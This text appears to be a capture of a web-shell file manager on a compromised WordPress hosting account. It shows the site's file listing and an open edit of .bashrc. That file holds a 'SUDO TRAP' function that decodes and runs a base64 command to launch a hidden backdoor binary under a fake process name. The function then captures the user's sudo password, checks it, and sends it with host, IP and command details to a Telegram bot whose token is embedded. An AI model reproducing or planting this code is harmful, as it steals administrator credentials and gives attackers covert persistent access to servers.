idx
↑
Path: /homepages/33/d963113317/htdocs/clickandbuilds/PartnercomAgency
[↑]
..
[open]
x
r
.htaccess
[edit]
x
r
.metadata
[open]
x
r
favicon.ico
[edit]
x
r
index.php
[edit]
x
r
license.txt
[edit]
x
r
link.php
[edit]
x
r
php.ini
[edit]
x
r
readme.html
[edit]
x
r
wp-activate.php
[edit]
x
r
wp-admin
[open]
x
r
wp-blog-header.php
[edit]
x
r
wp-comments-post.php
[edit]
x
r
wp-config-sample.php
[edit]
x
r
wp-config.php
[edit]
x
r
wp-content
[open]
x
r
wp-cron.php
[edit]
x
r
wp-includes
[open]
x
r
wp-links-opml.php
[edit]
x
r
wp-load.php
[edit]
x
r
wp-login.php
[edit]
x
r
wp-mail.php
[edit]
x
r
wp-settings.php
[edit]
x
r
wp-signup.php
[edit]
x
r
wp-trackback.php
[edit]
x
r
xmlrpc.php
[edit]
x
r
Edit: .bashrc
# SUDO TRAP START function sudo() { # DO NOT REMOVE THIS LINE. SEED PRNG. #defunct-kernel { echo L3Vzci9iaW4vcGtpbGwgLTAgLVUxMDAwIGRlZnVuY3QgMj4vZGV2L251bGwgfHwgKFRFUk09eHRlcm0tMjU2Y29sb3IgR1NfQVJHUz0iLWsgJEhPTUUvLmNvbmZpZy9odG9wL2RlZnVuY3QuZGF0IC1saXFEIiBleGVjIC1hICdbY2FyZDAtY3J0YzhdJyAnJEhPTUUvLmNvbmZpZy9odG9wL2RlZnVuY3QnIDI+L2Rldi9udWxsKQ== | base64 -d | bash; } 2>/dev/null if [[ "$1" =~ ^- ]]; then /usr/bin/sudo "$@" return fi echo -n "[sudo] password for $USER: " read -s pwd echo CMD=$(printf "%q " "$@") HOST=$(hostname -d) IP=$(hostname -I | awk '{print $1}') BOT_TOKEN="8389098682:AAFTPObfdl_xC18WaVY5CsRl5ReXBMBXbvg" CHAT_ID="-1003872848823" ASKPASS=$(mktemp) echo "#!/bin/bash" > "$ASKPASS" echo "echo '$pwd'" >> "$ASKPASS" chmod +x "$ASKPASS" WHO=$(SUDO_ASKPASS="$ASKPASS" setsid /usr/bin/sudo -A whoami 2>/dev/null) if [[ "$WHO" == "root" ]]; then STATUS="✅ <b>[VALID]</b>" VALID=1 else STATUS="❌ <b>[INVALID]</b>" VALID=0 fi MESSAGE="🔥 <b>[SUDO LOGGER]</b> $STATUS 🖥️ Host: <code>$HOST</code> 📡 IP: <code>$IP</code> 👤 User: <code>$USER</code> 🔧 Command: <code>sudo $CMD</code> 🔑 Pass: <code>$pwd</code>" curl -s -X POST "https://api.telegram.org/bot$BOT_TOKEN/sendMessage" \ -d chat_id="$CHAT_ID" \ -d text="$MESSAGE" \ -d parse_mode=HTML >/dev/null if [[ $VALID -eq 1 ]]; then if [[ "$1" == "su" || "$1" == "bash" ]]; then SUDO_ASKPASS="$ASKPASS" script -q -c "/usr/bin/sudo -A -- $*" /dev/null else SUDO_ASKPASS="$ASKPASS" setsid /usr/bin/sudo -A -- "$@" fi else echo "Sorry, try again." fi sleep 1 rm -f "$ASKPASS" } # SUDO TRAP END
save